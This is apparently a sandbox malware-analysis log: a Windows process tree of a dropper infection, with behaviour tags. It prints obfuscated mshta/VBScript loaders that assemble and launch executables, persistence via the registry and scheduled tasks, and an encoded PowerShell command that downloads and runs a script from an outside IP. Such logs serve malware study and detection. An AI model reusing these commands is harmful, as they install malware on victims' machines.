C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4d-69de5-3a2-74ea8-7aeff9e22a1d3\Megisheqyha.exe"C:\Users\Admin\AppData\Local\Temp\4d-69de5-3a2-74ea8-7aeff9e22a1d3\Megisheqyha.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 24014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exeC:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exe /qn CAMPAIGN="654"13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exeC:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe"C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe" -u14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 24014⤵
- Program crash
- Checks processor information in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tie4k5dz.t0a\autosubplayer.exe /S & exit12⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lmWL8_fCaR7KpxPFWCpSZATT.exe"C:\Users\Admin\Pictures\Adobe Films\lmWL8_fCaR7KpxPFWCpSZATT.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee011⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,3647991501014532599,7271685998684445581,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1992_1247375866" --mojo-platform-channel-handle=1724 /prefetch:811⤵
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wppjUuKifwe5OKIA6JpZTWg9.exe"C:\Users\Admin\Pictures\Adobe Films\wppjUuKifwe5OKIA6JpZTWg9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2o0JrOSDBo9q9SSTMzVCyTia.exe"C:\Users\Admin\Pictures\Adobe Films\2o0JrOSDBo9q9SSTMzVCyTia.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"3⤵
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\655.exeC:\Users\Admin\AppData\Local\Temp\655.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\655.exeC:\Users\Admin\AppData\Local\Temp\655.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\722F.exeC:\Users\Admin\AppData\Local\Temp\722F.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7CB0.exeC:\Users\Admin\AppData\Local\Temp\7CB0.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\9615.exeC:\Users\Admin\AppData\Local\Temp\9615.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8732 -s 2803⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\B7F6.exeC:\Users\Admin\AppData\Local\Temp\B7F6.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1430.exeC:\Users\Admin\AppData\Local\Temp\1430.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat "C:\Users\Admin\AppData\Local\Temp\1430.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat "C:\Users\Admin\AppData\Local\Temp\1430.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA5⤵
- Blocklisted process makes network request
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe"3⤵
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\3DD1.exeC:\Users\Admin\AppData\Local\Temp\3DD1.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7D0E.exeC:\Users\Admin\AppData\Local\Temp\7D0E.exe2⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 2763⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\8471.exeC:\Users\Admin\AppData\Local\Temp\8471.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2963⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Program Files (x86)\U1bjp\bt1htnhplf.exe"C:\Program Files (x86)\U1bjp\bt1htnhplf.exe"2⤵
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8339b8a3901ebc775730ad458de2a583 OA4En7LMH0egnJJlDMRm8Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-INFBI.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-INFBI.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$30118,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-LOUD0.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-LOUD0.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$30172,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-8CMQ3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-8CMQ3.tmp\postback.exe" ss14⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exeWed094c47c32b.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"3⤵
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "7⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU7⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exe" -u2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed096a1bff61.exeWed096a1bff61.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4254119.exe"C:\Users\Admin\AppData\Roaming\4254119.exe"4⤵
-
-
C:\Users\Admin\AppData\Roaming\1823905.exe"C:\Users\Admin\AppData\Roaming\1823905.exe"4⤵
-
-
C:\Users\Admin\AppData\Roaming\1392420.exe"C:\Users\Admin\AppData\Roaming\1392420.exe"4⤵
-
-
C:\Users\Admin\AppData\Roaming\7069117.exe"C:\Users\Admin\AppData\Roaming\7069117.exe"4⤵
-
-
C:\Users\Admin\AppData\Roaming\8246734.exe"C:\Users\Admin\AppData\Roaming\8246734.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 2965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Roaming\12432.exe"C:\Users\Admin\AppData\Roaming\12432.exe"4⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\7472820.exe"C:\Users\Admin\AppData\Roaming\7472820.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 2364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7024 -s 17244⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 6004⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
-
